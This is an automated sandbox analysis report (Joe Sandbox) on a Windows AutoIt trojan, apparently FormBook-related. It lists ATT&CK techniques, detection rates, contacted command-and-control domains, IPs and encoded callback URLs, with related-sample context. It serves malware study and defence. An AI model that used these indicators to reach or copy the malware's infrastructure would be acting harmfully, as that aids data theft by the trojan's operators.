Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	412 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	24%	ReversingLabs	Win32.Trojan.Strab
SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	24%	Virustotal		Browse
SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Link
elettrosistemista.zip	4%	Virustotal	Browse
www.660danm.top	11%	Virustotal	Browse
empowermedeco.com	6%	Virustotal	Browse
www.3xfootball.com	1%	Virustotal	Browse
www.antonio-vivaldi.mobi	11%	Virustotal	Browse
www.joyesi.xyz	0%	Virustotal	Browse
www.goldenjade-travel.com	3%	Virustotal	Browse
www.rssnewscast.com	10%	Virustotal	Browse
www.techchains.info	10%	Virustotal	Browse
www.magmadokum.com	10%	Virustotal	Browse
www.elettrosistemista.zip	5%	Virustotal	Browse
www.liangyuen528.com	2%	Virustotal	Browse
www.donnavariedades.com	5%	Virustotal	Browse
www.kasegitai.tokyo	0%	Virustotal	Browse
www.empowermedeco.com	5%	Virustotal	Browse
shops.myshopify.com	0%	Virustotal	Browse
natroredirect.natrocdn.com	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Link
http://www.magmadokum.com/fo8o/	10%	Virustotal	Browse
http://www.660danm.top/fo8o/	10%	Virustotal	Browse
http://www.rssnewscast.com/fo8o/	8%	Virustotal	Browse
http://www.goldenjade-travel.com/fo8o/	2%	Virustotal	Browse
http://www.kasegitai.tokyo/fo8o/	2%	Virustotal	Browse
http://www.antonio-vivaldi.mobi/fo8o/	11%	Virustotal	Browse
https://download.quark.cn/download/quarkpc?platform=android&ch=pcquark	0%	Virustotal	Browse
http://www.empowermedeco.com	5%	Virustotal	Browse
http://www.elettrosistemista.zip/fo8o/	4%	Virustotal	Browse
http://www.techchains.info/fo8o/	11%	Virustotal	Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
elettrosistemista.zip	195.110.124.133	true	false	4%, Virustotal, Browse	unknown
www.660danm.top	34.111.148.214	true	false	11%, Virustotal, Browse	unknown
empowermedeco.com	217.196.55.202	true	false	6%, Virustotal, Browse	unknown
www.3xfootball.com	154.215.72.110	true	false	1%, Virustotal, Browse	unknown
www.antonio-vivaldi.mobi	46.30.213.191	true	false	11%, Virustotal, Browse	unknown
www.joyesi.xyz	185.237.107.49	true	true	0%, Virustotal, Browse	unknown
www.goldenjade-travel.com	116.50.37.244	true	false	3%, Virustotal, Browse	unknown
www.rssnewscast.com	91.195.240.94	true	false	10%, Virustotal, Browse	unknown
www.techchains.info	66.29.149.46	true	false	10%, Virustotal, Browse	unknown
shops.myshopify.com	23.227.38.74	true	false	0%, Virustotal, Browse	unknown
natroredirect.natrocdn.com	85.159.66.93	true	false	0%, Virustotal, Browse	unknown
www.kasegitai.tokyo	202.172.28.202	true	false	0%, Virustotal, Browse	unknown
www.magmadokum.com	unknown	unknown	true	10%, Virustotal, Browse	unknown
www.donnavariedades.com	unknown	unknown	true	5%, Virustotal, Browse	unknown
www.liangyuen528.com	unknown	unknown	true	2%, Virustotal, Browse	unknown
www.empowermedeco.com	unknown	unknown	true	5%, Virustotal, Browse	unknown
www.elettrosistemista.zip	unknown	unknown	true	5%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.magmadokum.com/fo8o/?VVq=lF_H&bD=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjNWAySNtnq/EMXCTP7S4oEh8mb9sAZyquFiTVTuU6HpMKOeASrGw=	false		unknown
http://www.empowermedeco.com/fo8o/	false		unknown
http://www.kasegitai.tokyo/fo8o/?bD=0LNqIGaAWMhMIMLJ2VJjkgaiCF/+7LEr9lFre+yu3/9GvRNYi1uHmkVftE7qrB4Q/AkDmlcR4eDvWrml8CJ8ssmc93kihOWHWb8NTA0vbQpCHGBmxgdm5sPEbG1Wvor0LSPPjnI=&VVq=lF_H	false		unknown
http://www.donnavariedades.com/fo8o/?bD=l+301ZvITCxaX9AHm1YsL655mgOT9ufJgzctOQx29qSsrxX8kw49ykgmumiYYU42xMGxVig5KVZrJosPbs9pCTG1dl0n9Zx5sBovXqlibLG+oTQgCZHMA1AF4xfdSZkJv4XAGCI=&VVq=lF_H	false		unknown
http://www.empowermedeco.com/fo8o/?bD=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKYS1O+KnDGu0Ee7a9fQq7JRnHJ6pn6i4sEdb7G20jo8euDHkgubc=&VVq=lF_H	false		unknown
http://www.660danm.top/fo8o/	false	10%, Virustotal, Browse	unknown
http://www.magmadokum.com/fo8o/	false	10%, Virustotal, Browse	unknown
http://www.rssnewscast.com/fo8o/	false	8%, Virustotal, Browse	unknown
http://www.antonio-vivaldi.mobi/fo8o/?bD=PTl5gU/3CD/Xhg5Nd1HWi+eKOiJURJRFTZuVmm6gfrwSjnBrSraU/0GdHAsD0mFxNrARF0zWd8CLwvHKbs6Za05B0b8lb0SJyq2CvxKSeitE8AGVnlTlldZE82pgolkPyTnRDO8=&VVq=lF_H	false		unknown
http://www.elettrosistemista.zip/fo8o/?VVq=lF_H&bD=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMMgl3a4mkxzPbkN9BQKjpJMF6ezHcknvvvjzNmyPcHDwhODu1wVk=	false		unknown
http://www.kasegitai.tokyo/fo8o/	false	2%, Virustotal, Browse	unknown
http://www.goldenjade-travel.com/fo8o/	false	2%, Virustotal, Browse	unknown
http://www.antonio-vivaldi.mobi/fo8o/	false	11%, Virustotal, Browse	unknown
http://www.elettrosistemista.zip/fo8o/	false	4%, Virustotal, Browse	unknown
http://www.donnavariedades.com/fo8o/	false		unknown
http://www.goldenjade-travel.com/fo8o/?VVq=lF_H&bD=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFxgszkgIsi8wfa6/CPqkeX1kME9DjI2TvouO65OvKk6Nl8OEvQ/8=	false		unknown
http://www.rssnewscast.com/fo8o/?bD=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNp7YHjVi2aBezyBUOenUja13YBEIShwN33HoHbXtrY+oqbh1getk=&VVq=lF_H	false		unknown
http://www.660danm.top/fo8o/?VVq=lF_H&bD=tDTx8bBUOSgexthNYhTwmnqDpn1F4phVVMPWlhfWjKtbZMSfqXUeuAC/LbGtiEkR5FBEpxKkD9uJRHkvbrmrJNroXeq/Q4lVX4E9J28Ip9JfR0m5D5TtgLDY+NMsBNkqmJUMcRE=	false		unknown
http://www.techchains.info/fo8o/	false	11%, Virustotal, Browse	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	netbtugc.exe, 00000004.00000003.2464223271.0000000007EAD000.00000004.00000020.00020000.00000000.sdmp	false		high
https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js	netbtugc.exe, 00000004.00000002.4582885240.0000000006460000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4580670219.0000000004F88000.00000004.10000000.00040000.00000000.sdmp, lXlvzubPaBLtjusO.exe, 00000008.00000002.4579153517.0000000003D88000.00000004.00000001.00040000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	netbtugc.exe, 00000004.00000003.2464223271.0000000007EAD000.00000004.00000020.00020000.00000000.sdmp	false		high
https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js	netbtugc.exe, 00000004.00000002.4582885240.0000000006460000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4580670219.0000000004F88000.00000004.10000000.00040000.00000000.sdmp, lXlvzubPaBLtjusO.exe, 00000008.00000002.4579153517.0000000003D88000.00000004.00000001.00040000.00000000.sdmp	false		high
http://img.sedoparking.com	netbtugc.exe, 00000004.00000002.4580670219.00000000047AE000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4582885240.0000000006460000.00000004.00000800.00020000.00000000.sdmp, lXlvzubPaBLtjusO.exe, 00000008.00000002.4579153517.00000000035AE000.00000004.00000001.00040000.00000000.sdmp	false		high
https://track.uc.cn/collect	netbtugc.exe, 00000004.00000002.4582885240.0000000006460000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4580670219.0000000004F88000.00000004.10000000.00040000.00000000.sdmp, lXlvzubPaBLtjusO.exe, 00000008.00000002.4579153517.0000000003D88000.00000004.00000001.00040000.00000000.sdmp	false		high
https://www.goldenjade-travel.com/fo8o/?VVq=lF_H&bD=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9b	netbtugc.exe, 00000004.00000002.4580670219.00000000042F8000.00000004.10000000.00040000.00000000.sdmp, lXlvzubPaBLtjusO.exe, 00000008.00000002.4579153517.00000000030F8000.00000004.00000001.00040000.00000000.sdmp	false		unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	netbtugc.exe, 00000004.00000003.2464223271.0000000007EAD000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_	netbtugc.exe, 00000004.00000002.4580670219.00000000047AE000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4582885240.0000000006460000.00000004.00000800.00020000.00000000.sdmp, lXlvzubPaBLtjusO.exe, 00000008.00000002.4579153517.00000000035AE000.00000004.00000001.00040000.00000000.sdmp	false		high
https://www.shopify.com/admin/settings/domains	netbtugc.exe, 00000004.00000002.4580670219.0000000004DF6000.00000004.10000000.00040000.00000000.sdmp, lXlvzubPaBLtjusO.exe, 00000008.00000002.4579153517.0000000003BF6000.00000004.00000001.00040000.00000000.sdmp	false		high
https://cdn.shopify.com/s/files/1/0458/4836/3030/files/ShopifySans-Medium.woff2?v=1674610916	netbtugc.exe, 00000004.00000002.4580670219.0000000004DF6000.00000004.10000000.00040000.00000000.sdmp, lXlvzubPaBLtjusO.exe, 00000008.00000002.4579153517.0000000003BF6000.00000004.00000001.00040000.00000000.sdmp	false		high
https://musee.mobi/vivaldi/fo8o/?bD=PTl5gU/3CD/Xhg5Nd1HWi+eKOiJURJRFTZuVmm6gfrwSjnBrSraU/0GdHAsD	netbtugc.exe, 00000004.00000002.4580670219.000000000448A000.00000004.10000000.00040000.00000000.sdmp, lXlvzubPaBLtjusO.exe, 00000008.00000002.4579153517.000000000328A000.00000004.00000001.00040000.00000000.sdmp	false		unknown
https://accounts.shopify.com/rec	netbtugc.exe, 00000004.00000002.4580670219.0000000004DF6000.00000004.10000000.00040000.00000000.sdmp, lXlvzubPaBLtjusO.exe, 00000008.00000002.4579153517.0000000003BF6000.00000004.00000001.00040000.00000000.sdmp	false		high
https://hm.baidu.com/hm.js?	netbtugc.exe, 00000004.00000002.4582885240.0000000006460000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4580670219.0000000004F88000.00000004.10000000.00040000.00000000.sdmp, lXlvzubPaBLtjusO.exe, 00000008.00000002.4579153517.0000000003D88000.00000004.00000001.00040000.00000000.sdmp	false		high
https://musee.mobi/vivaldi/fo8o/?bD=PTl5gU/3CD/Xhg5Nd1HWi	netbtugc.exe, 00000004.00000002.4580670219.000000000448A000.00000004.10000000.00040000.00000000.sdmp, lXlvzubPaBLtjusO.exe, 00000008.00000002.4579153517.000000000328A000.00000004.00000001.00040000.00000000.sdmp	false		unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	netbtugc.exe, 00000004.00000003.2464223271.0000000007EAD000.00000004.00000020.00020000.00000000.sdmp	false		high
https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js	netbtugc.exe, 00000004.00000002.4582885240.0000000006460000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4580670219.0000000004F88000.00000004.10000000.00040000.00000000.sdmp, lXlvzubPaBLtjusO.exe, 00000008.00000002.4579153517.0000000003D88000.00000004.00000001.00040000.00000000.sdmp	false		high
https://image.uc.cn/s/uae/g/3o/berg/static/index.c4bc5b38d870fecd8a1f.css	netbtugc.exe, 00000004.00000002.4582885240.0000000006460000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4580670219.0000000004F88000.00000004.10000000.00040000.00000000.sdmp, lXlvzubPaBLtjusO.exe, 00000008.00000002.4579153517.0000000003D88000.00000004.00000001.00040000.00000000.sdmp	false		high
https://download.quark.cn/download/quarkpc?platform=android&ch=pcquark	netbtugc.exe, 00000004.00000002.4582885240.0000000006460000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4580670219.0000000004F88000.00000004.10000000.00040000.00000000.sdmp, lXlvzubPaBLtjusO.exe, 00000008.00000002.4579153517.0000000003D88000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	netbtugc.exe, 00000004.00000003.2464223271.0000000007EAD000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	netbtugc.exe, 00000004.00000003.2464223271.0000000007EAD000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.empowermedeco.com	lXlvzubPaBLtjusO.exe, 00000008.00000002.4581391974.0000000004E7F000.00000040.80000000.00040000.00000000.sdmp	false	5%, Virustotal, Browse	unknown
https://www.ecosia.org/newtab/	netbtugc.exe, 00000004.00000003.2464223271.0000000007EAD000.00000004.00000020.00020000.00000000.sdmp	false		high
https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js	netbtugc.exe, 00000004.00000002.4582885240.0000000006460000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4580670219.0000000004F88000.00000004.10000000.00040000.00000000.sdmp, lXlvzubPaBLtjusO.exe, 00000008.00000002.4579153517.0000000003D88000.00000004.00000001.00040000.00000000.sdmp	false		high
https://www.sedo.com/services/parking.php3	netbtugc.exe, 00000004.00000002.4582885240.0000000006460000.00000004.00000800.00020000.00000000.sdmp, lXlvzubPaBLtjusO.exe, 00000008.00000002.4579153517.00000000035AE000.00000004.00000001.00040000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	netbtugc.exe, 00000004.00000003.2464223271.0000000007EAD000.00000004.00000020.00020000.00000000.sdmp	false		high
https://codepen.io/uzcho_/pens/popular/?grid_type=list	netbtugc.exe, 00000004.00000002.4580670219.0000000004AD2000.00000004.10000000.00040000.00000000.sdmp, lXlvzubPaBLtjusO.exe, 00000008.00000002.4579153517.00000000038D2000.00000004.00000001.00040000.00000000.sdmp	false		high
https://codepen.io/uzcho_/pen/eYdmdXw.css	netbtugc.exe, 00000004.00000002.4580670219.0000000004AD2000.00000004.10000000.00040000.00000000.sdmp, lXlvzubPaBLtjusO.exe, 00000008.00000002.4579153517.00000000038D2000.00000004.00000001.00040000.00000000.sdmp	false		high
https://www.goldenjade-travel.com/fo8o/?VVq=lF_H&bD=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr	netbtugc.exe, 00000004.00000002.4580670219.00000000042F8000.00000004.10000000.00040000.00000000.sdmp, lXlvzubPaBLtjusO.exe, 00000008.00000002.4579153517.00000000030F8000.00000004.00000001.00040000.00000000.sdmp	false		unknown
https://cdn.shopify.com/s/files/1/0458/4836/3030/files/ShopifySans-Regular.woff2?v=1674610915	netbtugc.exe, 00000004.00000002.4580670219.0000000004DF6000.00000004.10000000.00040000.00000000.sdmp, lXlvzubPaBLtjusO.exe, 00000008.00000002.4579153517.0000000003BF6000.00000004.00000001.00040000.00000000.sdmp	false		high
https://www.empowermedeco.com/fo8o/?bD=mxnR	netbtugc.exe, 00000004.00000002.4580670219.000000000511A000.00000004.10000000.00040000.00000000.sdmp, lXlvzubPaBLtjusO.exe, 00000008.00000002.4579153517.0000000003F1A000.00000004.00000001.00040000.00000000.sdmp	false		unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	netbtugc.exe, 00000004.00000003.2464223271.0000000007EAD000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
91.195.240.94	www.rssnewscast.com	Germany	47846	SEDO-ASDE	false
185.237.107.49	www.joyesi.xyz	Ukraine	56421	UA-WEECOMI-ASUA	true
154.215.72.110	www.3xfootball.com	Seychelles	132839	POWERLINE-AS-APPOWERLINEDATACENTERHK	false
195.110.124.133	elettrosistemista.zip	Italy	39729	REGISTER-ASIT	false
34.111.148.214	www.660danm.top	United States	15169	GOOGLEUS	false
116.50.37.244	www.goldenjade-travel.com	Taiwan; Republic of China (ROC)	18046	DONGFONG-TWDongFongTechnologyCoLtdTW	false
23.227.38.74	shops.myshopify.com	Canada	13335	CLOUDFLARENETUS	false
85.159.66.93	natroredirect.natrocdn.com	Turkey	34619	CIZGITR	false
202.172.28.202	www.kasegitai.tokyo	Japan	37907	DIGIROCKDigiRockIncJP	false
46.30.213.191	www.antonio-vivaldi.mobi	Denmark	51468	ONECOMDK	false
66.29.149.46	www.techchains.info	United States	19538	ADVANTAGECOMUS	false
217.196.55.202	empowermedeco.com	Norway	29300	AS-DIRECTCONNECTNO	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1428501
Start date and time:	2024-04-19 03:27:08 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 46s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/5@13/12
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 97% Number of executed functions: 58 Number of non-executed functions: 272
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target lXlvzubPaBLtjusO.exe, PID 4548 because it is empty
HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.

Simulations

Behavior and APIs

Time	Type	Description
03:28:53	API Interceptor	12531645x Sleep call for process: netbtugc.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
91.195.240.94	DOC 331-100920-00.exe	Get hash	malicious	FormBook	Browse	www.rssnewscast.com/fo8o/
	DOC 331-100920-00.exe	Get hash	malicious	FormBook	Browse	www.rssnewscast.com/fo8o/
	fedex awb &Invoice.vbs	Get hash	malicious	FormBook	Browse	www.winhgx.com/r6ib/
	order enquiry PDF.vbs	Get hash	malicious	FormBook	Browse	www.5597043.com/uf1r/?UDwd=fRlBiYKTb4kHHTeAB+JUEo8QwhpBajaUBAMzSQktRYr91tJh38DuECURDEfreCzcEFd3cb/SjxROJA5JZTrgYxjmLw41heutXinNmJLTVm0wgqrelA==&sRy=BLaLYB
	inpau292101.js	Get hash	malicious	FormBook	Browse	www.itsolutionsguide.com/h4wu/
	bin.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.5597043.com/nrup/
	ccWXalS8xg.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.5597043.com/nrup/?Gv=2at1c1MHk4LdsVUDX7pNDf+fAhTXeAfnTyG93G2uP4ilKgyCyFz2asT5AaTCMTK+FwXayJ+KsNmilZED2txkhAZ8TPVN5OugBakdvvUOZZN5OdK6QUrIUUU=&jH1=cn4P66
	1No1dv4uLe.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.5597043.com/nrup/
	Sf5Aw7E8Cu.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.5597043.com/nrup/
	55,000 receipt 18-03-2024 _PDF.vbs	Get hash	malicious	FormBook	Browse	www.5597043.com/uf1r/
185.237.107.49	DOC 331-100920-00.exe	Get hash	malicious	FormBook	Browse
154.215.72.110	DOC 331-100920-00.exe	Get hash	malicious	FormBook	Browse
154.215.72.110	DOC 331-100920-00.exe	Get hash	malicious	FormBook	Browse
195.110.124.133	DOC 331-100920-00.exe	Get hash	malicious	FormBook	Browse	www.elettrosistemista.zip/fo8o/
	DOC 331-100920-00.exe	Get hash	malicious	FormBook	Browse	www.elettrosistemista.zip/fo8o/
	yx0H3RO9ur.exe	Get hash	malicious	FormBook	Browse	www.rcpbooks.site/ns03/?UPlLi=vFQdbbR8L2nPLn&uTsxF=LY9IMeCXDxrmkBkQpTG36JChwL1RxDqQm+j8bD1e2UXkf2UJCaZNetcSSzDM9AEFNVBS
	Grundforbedre39.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.guiguigohost.com/m9so/
	Apexes.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.guiguigohost.com/m9so/
	oZF2kXw4ZRc8NjL.exe	Get hash	malicious	FormBook	Browse	www.rcpbooks.site/ns03/?wHut=ghlHUvuPX&yBkpfpPX=LY9IMeCXDxrmkBkQpTG36JChwL1RxDqQm+j8bD1e2UXkf2UJCaZNetcSSzDM9AEFNVBS
	Arborean.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.guiguigohost.com/m9so/
	Medarbejderstabens189.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.guiguigohost.com/m9so/
	Yolk.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.radiciholding.com/hjen/
	Americanistic57.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.radiciholding.com/hjen/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.joyesi.xyz	DOC 331-100920-00.exe	Get hash	malicious	FormBook	Browse	185.237.107.49
www.joyesi.xyz	Product_Specs.exe	Get hash	malicious	FormBook, GuLoader	Browse	185.237.107.49
www.rssnewscast.com	DOC 331-100920-00.exe	Get hash	malicious	FormBook	Browse	91.195.240.94
	DOC 331-100920-00.exe	Get hash	malicious	FormBook	Browse	91.195.240.94
	New_Order.exe	Get hash	malicious	FormBook	Browse	91.195.240.94
	file.exe	Get hash	malicious	FormBook	Browse	91.195.240.94
	22082023_dekont.pdf.exe	Get hash	malicious	FormBook	Browse	91.195.240.94
www.techchains.info	DOC 331-100920-00.exe	Get hash	malicious	FormBook	Browse	66.29.149.46
	DOC 331-100920-00.exe	Get hash	malicious	FormBook	Browse	66.29.149.46
	r01-25Arrival.exe	Get hash	malicious	FormBook	Browse	66.29.149.46
	r0105-12132023DEC.exe	Get hash	malicious	FormBook	Browse	66.29.149.46
	r1210DEC-GIG.exe	Get hash	malicious	FormBook, zgRAT	Browse	66.29.149.46
	7NQmHsp3aG.exe	Get hash	malicious	FormBook	Browse	66.29.149.46
	Payment_Notification.exe	Get hash	malicious	FormBook, GuLoader	Browse	66.29.149.46
	3306_202.EXE.exe	Get hash	malicious	FormBook	Browse	66.29.149.46
	S004212823122940,PDF.exe	Get hash	malicious	FormBook	Browse	66.29.149.46
	REQUEST FOR 01-DEC 2023.exe	Get hash	malicious	FormBook	Browse	66.29.149.46
www.3xfootball.com	DOC 331-100920-00.exe	Get hash	malicious	FormBook	Browse	154.215.72.110
	DOC 331-100920-00.exe	Get hash	malicious	FormBook	Browse	154.215.72.110
	SecuriteInfo.com.Win32.CrypterX-gen.14209.1079.exe	Get hash	malicious	FormBook	Browse	154.215.74.46
www.antonio-vivaldi.mobi	DOC 331-100920-00.exe	Get hash	malicious	FormBook	Browse	46.30.213.191
	DOC 331-100920-00.exe	Get hash	malicious	FormBook	Browse	46.30.213.191
	doc2009988876370093845_1601202400.exe	Get hash	malicious	FormBook, GuLoader, Remcos	Browse	46.30.213.185
	SecuriteInfo.com.Win32.CrypterX-gen.14209.1079.exe	Get hash	malicious	FormBook	Browse	46.30.213.185
	PO203-09024.exe	Get hash	malicious	FormBook, NSISDropper	Browse	46.30.213.185
	PO#YATCH-INT'L.exe	Get hash	malicious	FormBook, NSISDropper	Browse	46.30.213.185
	QUOTATIONYATCHINT'L.exe	Get hash	malicious	FormBook, NSISDropper	Browse	46.30.213.185
	PURCHASE_ORDER_091020.exe	Get hash	malicious	FormBook	Browse	46.30.213.185
	SecuriteInfo.com.FileRepMalware.18604.15295.exe	Get hash	malicious	FormBook	Browse	46.30.213.185
	OUR_REF_RFQ_6000066536_-_PR_10023150.exe	Get hash	malicious	FormBook	Browse	46.30.213.185
www.goldenjade-travel.com	DOC 331-100920-00.exe	Get hash	malicious	FormBook	Browse	116.50.37.244
www.goldenjade-travel.com	DOC 331-100920-00.exe	Get hash	malicious	FormBook	Browse	116.50.37.244

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
POWERLINE-AS-APPOWERLINEDATACENTERHK	DOC 331-100920-00.exe	Get hash	malicious	FormBook	Browse	154.215.72.110
	DOC 331-100920-00.exe	Get hash	malicious	FormBook	Browse	154.215.72.110
	kl7nWo7u71.elf	Get hash	malicious	Gafgyt, Mirai	Browse	156.251.7.154
	OPs5j7Yjb8.elf	Get hash	malicious	Gafgyt, Mirai	Browse	156.244.234.144
	202404153836038.EXE.exe	Get hash	malicious	FormBook, GuLoader	Browse	160.124.21.234
	hCGaMRj2il.elf	Get hash	malicious	Mirai	Browse	154.203.73.149
	CQic0Eq1e2.elf	Get hash	malicious	Mirai	Browse	103.215.215.191
	PcYRqnCfZK.elf	Get hash	malicious	Mirai	Browse	154.203.73.104
	Nc2zs66ZvW.elf	Get hash	malicious	Unknown	Browse	160.124.189.35
	vocJ80emzk.elf	Get hash	malicious	Mirai	Browse	156.242.159.8
REGISTER-ASIT	DOC 331-100920-00.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
	DOC 331-100920-00.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
	160420241245287.exe	Get hash	malicious	FormBook, GuLoader	Browse	81.88.63.46
	2024164846750.exe	Get hash	malicious	FormBook, GuLoader	Browse	81.88.63.46
	202404153836038.EXE.exe	Get hash	malicious	FormBook, GuLoader	Browse	81.88.63.46
	Ordin de plat#U0103.exe	Get hash	malicious	FormBook	Browse	81.88.63.46
	zamowienie_002523.exe	Get hash	malicious	FormBook, GuLoader	Browse	81.88.63.46
	mrPTE618YB.exe	Get hash	malicious	PureLog Stealer	Browse	195.110.124.188
	yx0H3RO9ur.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
	Trsten.vbs	Get hash	malicious	FormBook, GuLoader	Browse	81.88.57.68
DONGFONG-TWDongFongTechnologyCoLtdTW	DOC 331-100920-00.exe	Get hash	malicious	FormBook	Browse	116.50.37.244
	DOC 331-100920-00.exe	Get hash	malicious	FormBook	Browse	116.50.37.244
	4eGsl7kZ8Y.elf	Get hash	malicious	Mirai	Browse	116.50.38.9
	Iq9FbxpCn8.elf	Get hash	malicious	Unknown	Browse	101.0.250.121
	rWDo1Us2zv.elf	Get hash	malicious	Mirai	Browse	156.227.251.192
	arm.elf	Get hash	malicious	Mirai, Moobot	Browse	119.15.228.163
	skid.x86-20230924-1126.elf	Get hash	malicious	Mirai	Browse	156.227.251.175
	Y1s85ucZ3T.elf	Get hash	malicious	Unknown	Browse	119.15.194.230
	211vlko6tx.elf	Get hash	malicious	Moobot	Browse	119.15.207.49
	19p8usWQu0.elf	Get hash	malicious	Mirai, Moobot	Browse	119.15.228.115
UA-WEECOMI-ASUA	DOC 331-100920-00.exe	Get hash	malicious	FormBook	Browse	185.237.107.49
SEDO-ASDE	PO_La-Tanerie04180240124.vbs	Get hash	malicious	FormBook, GuLoader	Browse	91.195.240.19
	PO_La-Tanerie04180240124.bat	Get hash	malicious	FormBook, GuLoader	Browse	91.195.240.19
	DOC 331-100920-00.exe	Get hash	malicious	FormBook	Browse	91.195.240.94
	DOC 331-100920-00.exe	Get hash	malicious	FormBook	Browse	91.195.240.94
